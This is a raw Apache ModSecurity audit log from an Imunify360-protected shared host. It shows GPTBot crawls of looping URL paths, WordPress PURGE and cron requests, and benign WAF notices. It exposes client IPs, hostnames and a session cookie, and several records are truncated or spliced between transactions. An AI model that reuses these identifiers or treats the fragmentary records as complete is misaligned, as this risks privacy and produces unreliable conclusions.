[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258661023999 1245383 (- - -) Stopwatch2: 1751258661023999 1245383; combined=2546, p1=91, p2=2316, p3=0, p4=0, p5=139, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --66aa5b3e-Z-- --1aa6c879-A-- [30/Jun/2025:10:14:22.593120 +0530] aGIWJhB7BDBKyxEB5DxhmAAAAB0 20.171.207.232 52634 192.168.74.40 443 --1aa6c879-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/aainag/https/images/our-services.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --1aa6c879-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --1aa6c879-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258662578622 14755 (- - -) Stopwatch2: 1751258662578622 14755; combined=3282, p1=106, p2=3014, p3=0, p4=0, p5=161, sr=51, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --1aa6c879-Z-- --2c89be22-A-- [30/Jun/2025:10:14:23.955146 +0530] aGIWJm57Rpc9jlvvQFfWiAAAAAk 103.185.74.40 29334 192.168.74.40 443 --2c89be22-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --2c89be22-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --2c89be22-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258662557940 1397452 (- - -) Stopwatch2: 1751258662557940 1397452; combined=2657, p1=134, p2=2320, p3=0, p4=0, p5=203, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --2c89be22-Z-- --5213693d-A-- [30/Jun/2025:10:14:24.172136 +0530] aGIWKBzeZOcGeFSOIv5wMQAAACk 43.156.109.53 41218 192.168.74.40 80 --5213693d-B-- GET / HTTP/1.1 Host: hifaireapparels.com User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Upgrade-Insecure-Requests: 1 --5213693d-F-- HTTP/1.1 200 OK Content-Length: 447 Connection: close -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258940531842 940724 (- - -) Stopwatch2: 1751258940531842 940724; combined=3897, p1=116, p2=3406, p3=137, p4=3, p5=234, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b02b462c-Z-- --95c52d36-A-- [30/Jun/2025:10:19:03.797532 +0530] aGIXPlQIGeYbKHDkIDvuhgAAACU 103.185.74.40 41966 192.168.74.40 443 --95c52d36-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --95c52d36-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --95c52d36-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258942594956 1202850 (- - -) Stopwatch2: 1751258942594956 1202850; combined=2983, p1=97, p2=2726, p3=0, p4=0, p5=160, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --95c52d36-Z-- --b65e6e78-A-- [30/Jun/2025:10:19:03.850818 +0530] aGIXPwquW-ZG6If59R0EDgAAAC0 20.171.207.232 55972 192.168.74.40 443 --b65e6e78-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/Rajasthan-Travel-Guides/images/aainag/shipping.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --b65e6e78-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258943835274 15848 (- - -) Stopwatch2: 1751258943835274 15848; combined=2811, p1=186, p2=2483, p3=0, p4=0, p5=141, sr=55, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --b65e6e78-Z-- --0a8ee218-A-- [30/Jun/2025:10:19:05.105640 +0530] aGIXQHUmsl6F7MklQAIIcgAAAAU 103.185.74.40 3786 192.168.74.40 443 --0a8ee218-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --0a8ee218-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --0a8ee218-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258944012783 1093560 (- - -) Stopwatch2: 1751258944012783 1093560; combined=4159, p1=269, p2=3728, p3=0, p4=0, p5=162, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --0a8ee218-Z-- --bee8e121-A-- [30/Jun/2025:10:19:06.230681 +0530] aGIXQgquW-ZG6If59R0EEAAAAC0 20.171.207.232 55972 192.168.74.40 443 --bee8e121-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/hotels-udaipur.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --bee8e121-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258948621573 16482 (- - -) Stopwatch2: 1751258948621573 16482; combined=3110, p1=117, p2=2832, p3=0, p4=0, p5=161, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --10397327-Z-- --6cfba47d-A-- [30/Jun/2025:10:19:09.888094 +0530] aGIXRNe07vLCpF4qxaCfEgAAAAw 103.185.74.40 3811 192.168.74.40 443 --6cfba47d-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --6cfba47d-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --6cfba47d-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258948752734 1135914 (- - -) Stopwatch2: 1751258948752734 1135914; combined=2488, p1=82, p2=2243, p3=0, p4=0, p5=163, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --6cfba47d-Z-- --f6e4c226-A-- [30/Jun/2025:10:19:11.023576 +0530] aGIXRwquW-ZG6If59R0EFAAAAC0 20.171.207.232 55972 192.168.74.40 443 --f6e4c226-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/aainag/https/Rajasthan-Travel-Guides/history.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --f6e4c226-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258951004530 19494 (- - -) Stopwatch2: 1751258951004530 19494; combined=4237, p1=148, p2=3917, p3=0, p4=0, p5=172, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --f6e4c226-Z-- --e626fb5a-A-- [30/Jun/2025:10:19:11.266650 +0530] aGIXRobAthmJ1wCkTQSjDwAAAAE 103.185.74.40 18329 192.168.74.40 443 --e626fb5a-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --e626fb5a-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --e626fb5a-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751258950100434 1166702 (- - -) Stopwatch2: 1751258950100434 1166702; combined=3147, p1=95, p2=2873, p3=0, p4=0, p5=179, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --e626fb5a-Z-- --5d20782a-A-- [30/Jun/2025:10:19:12.159292 +0530] aGIXSAquW-ZG6If59R0EFQAAAC0 20.171.207.232 55972 192.168.74.40 443 --5d20782a-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/Rajasthan-Travel-Guides/aainag/https/images/history.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --5d20782a-F-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751259429539165 1478633 (- - -) Stopwatch2: 1751259429539165 1478633; combined=2687, p1=92, p2=2209, p3=139, p4=4, p5=242, sr=62, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --32022717-Z-- --86996616-A-- [30/Jun/2025:10:27:13.807200 +0530] aGIZKW6zbUVoR8to75EZmgAAAA0 103.185.74.40 34605 192.168.74.40 443 --86996616-B-- POST /wp-cron.php?doing_wp_cron=1751259433.5753750801086425781250 HTTP/1.1 Host: kpowers.co.in User-Agent: WordPress/6.8.1; https://kpowers.co.in Accept: */* Accept-Encoding: deflate, gzip Connection: close Content-Length: 0 Content-Type: application/x-www-form-urlencoded --86996616-C-- --86996616-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 0 Connection: close Content-Type: text/html; charset=UTF-8 --86996616-H-- Message: Pattern match "fff[7-9a-d]$" at UNIQUE_ID. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/016_i360_monitor.conf"] [line "193"] [id "77316842"] [msg "IM360 WAF: Performance measurement||Method:POST||Perf all:combined=5542, p1=159, p2=5056, p3=320, p4=7, p5=0, sr=58, sw=0, l=0, gc=0||Py scan:9689||Lua scan:||RBL:||RSV:7.05||RS:200||T:APACHE||Content-Length:0||"] [severity "NOTICE"] [tag "service_im360"] [tag "noshow"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751259433787946 19683 (- - -) Stopwatch2: 1751259433787946 19683; combined=5951, p1=159, p2=5056, p3=320, p4=7, p5=409, sr=58, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --86996616-Z-- --a172a94f-A-- [30/Jun/2025:10:27:16.167408 +0530] aGIZKN90v-k5czmpYtkNKgAAACo 43.157.180.116 55980 192.168.74.40 443 --a172a94f-B-- GET / HTTP/1.1 Host: kpowers.co.in User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding: gzip Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7 Cache-Control: no-cache Connection: keep-alive, close Pragma: no-cache Referer: http://kpowers.co.in Upgrade-Insecure-Requests: 1 --a172a94f-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262260662696 17689 (- - -) Stopwatch2: 1751262260662696 17689; combined=3665, p1=124, p2=3360, p3=0, p4=0, p5=181, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --c592f836-Z-- --09238c26-A-- [30/Jun/2025:11:14:20.854338 +0530] aGIkM5cyE7o0P9SeX0Cq4AAAADA 103.185.74.40 33203 192.168.74.40 443 --09238c26-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --09238c26-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --09238c26-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262259449635 1404986 (- - -) Stopwatch2: 1751262259449635 1404986; combined=3413, p1=100, p2=3100, p3=0, p4=0, p5=213, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --09238c26-Z-- --305e101b-A-- [30/Jun/2025:11:14:21.838287 +0530] aGIkNaUVl7utXwWpYKL-ygAAAGE 20.171.207.232 43372 192.168.74.40 443 --305e101b-B-- GET /aaina/images/rajasthan-tours-from-udaipur/images/https/aainag/images/js/aainag/history.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --305e101b-F-- HTTP/1.1 200 OK X-Powered-By: PHP/8.1.18 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --305e101b-H-- -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262261822678 15916 (- - -) Stopwatch2: 1751262261822678 15916; combined=2834, p1=132, p2=2566, p3=0, p4=0, p5=136, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --305e101b-Z-- --8a88a228-A-- [30/Jun/2025:11:14:22.517612 +0530] aGIkNZ83UxAyrLHNqGZBVgAAAAc 103.185.74.40 10313 192.168.74.40 443 --8a88a228-B-- PURGE /.* HTTP/1.1 Host: insightconvey.com User-Agent: WordPress/6.8.1; https://insightconvey.com; EPC/v2.2.2/epc_scheduled_purge_all Accept: */* Accept-Encoding: deflate, gzip Connection: close --8a88a228-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.1.18 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private Link: <https://insightconvey.com/wp-json/>; rel="https://api.w.org/" X-Newfold-Cache-Level: 0 X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --8a88a228-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751262261064356 1453368 (- - -) Stopwatch2: 1751262261064356 1453368; combined=2394, p1=129, p2=2084, p3=0, p4=0, p5=180, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --8a88a228-Z-- --06196678-A-- [30/Jun/2025:11:14:22.906898 +0530] aGIkNiq3IWCbc46XH1SCYAAAAFQ 20.171.207.114 51248 192.168.74.40 443 --06196678-B-- GET /returns_refunds.php/admin@oz/sweetalert-master/dist/js/images/admin@oz/sweetalert-master/dist/images/images/js/admin@oz/sweetalert-master/dist/js/blog.php HTTP/1.1 x-openai-host-hash: 68043589 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate cookie: PHPSESSID=0cdd9q4miavt74qictli9mjgo0 host: ozautomotives.com.au --06196678-F-- HTTP/1.1 200 OK X-Powered-By: PHP/5.6.40 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264463509299 17511 (- - -) Stopwatch2: 1751264463509299 17511; combined=3681, p1=129, p2=3386, p3=0, p4=0, p5=166, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --b4a1b01e-Z-- --cb93a054-A-- [30/Jun/2025:11:51:03.735361 +0530] aGIszpnKb72L72THikfB3wAAAD8 103.185.74.40 63493 192.168.74.40 443 --cb93a054-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --cb93a054-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --cb93a054-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. [file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264462033721 1703076 (- - -) Stopwatch2: 1751264462033721 1703076; combined=3631, p1=118, p2=3251, p3=0, p4=0, p5=262, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
Server: Apache Engine-Mode: "ENABLED" --cb93a054-Z-- --df47c320-A-- [30/Jun/2025:11:51:03.895844 +0530] aGIsz84IF6ZvuwO8SwkX4gAAACY 170.245.31.227 35696 192.168.74.40 443 --df47c320-B-- POST /contact-incrementertech HTTP/1.1 Host: www.INCREMENTERTECH.COM User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Transfer-Encoding: chunked Accept: */* Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cache-Control: max-age=0 Connection: close -- Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264464774002 18117 (- - -) Stopwatch2: 1751264464774002 18117; combined=4027, p1=175, p2=3706, p3=0, p4=0, p5=146, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --84a6d835-Z-- --ca8f4164-A-- [30/Jun/2025:11:51:05.148133 +0530] aGIszyvjmj29RdH0MDN1GwAAADE 103.185.74.40 61453 192.168.74.40 443 --ca8f4164-B-- PURGE /.* HTTP/1.1 Host: siaretech.in User-Agent: WordPress/6.8.1; https://siaretech.in; EPC/v2.2.1/option_update_two_optimized_date_front_page Accept: */* Accept-Encoding: deflate, gzip Connection: close --ca8f4164-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/7.4.33 Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0, no-store, private X-TWO-OPTIMIZE: 1 X-TWO-VERSION: 2.30.7 X-TWO-CACHE-DATE: 1732769506 X-TWO-WEBP: 1 X-TWO-PAGE-IS-OPTIMIZED: 0 X-TWO-OPTIMIZE-REASON: Request mode is: PURGE Link: <https://siaretech.in/wp-json/>; rel="https://api.w.org/" X-Endurance-Cache-Level: 2 X-nginx-cache: WordPress Vary: User-Agent Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8 --ca8f4164-H-- Message: Match of "pm .thumbswysiwyg/ .thumbs/ .well-known/ /.jpg" against "MATCHED_VAR" required. 
[file "/etc/apache2/conf.d/modsec_vendor_configs/imunify360-full-apache/007_i360_custom.conf"] [line "228"] [id "77350309"] [msg "IM360 WAF: Hidden file access||RSV:7.05||RS:0||T:APACHE||QS:||"] [severity "NOTICE"] [tag "service_im360"] Apache-Handler: application/x-httpd-ea-php80___lsphp Stopwatch: 1751264463949060 1199804 (- - -) Stopwatch2: 1751264463949060 1199804; combined=2591, p1=92, p2=2324, p3=0, p4=0, p5=174, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). Server: Apache Engine-Mode: "ENABLED" --ca8f4164-Z-- --0db85f02-A-- [30/Jun/2025:11:51:05.998228 +0530] aGIs0Sw0PB_sNO9OrVxz7QAAAAY 20.171.207.232 47916 192.168.74.40 443 --0db85f02-B-- GET /rajasthan-tours-from-Jaisalmer/rajasthan-tours-from-udaipur/aainag/images/images/about-us.php HTTP/1.1 x-openai-host-hash: 800249317 accept: */* from: gptbot(at)openai.com user-agent: Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot) accept-encoding: gzip, br, deflate host: abhaytravelsindia.digitaltheka.com --0db85f02-F-- -- Producer: ModSecurity for Apache/2.9.7 (http://www.modsecurity.org/). 
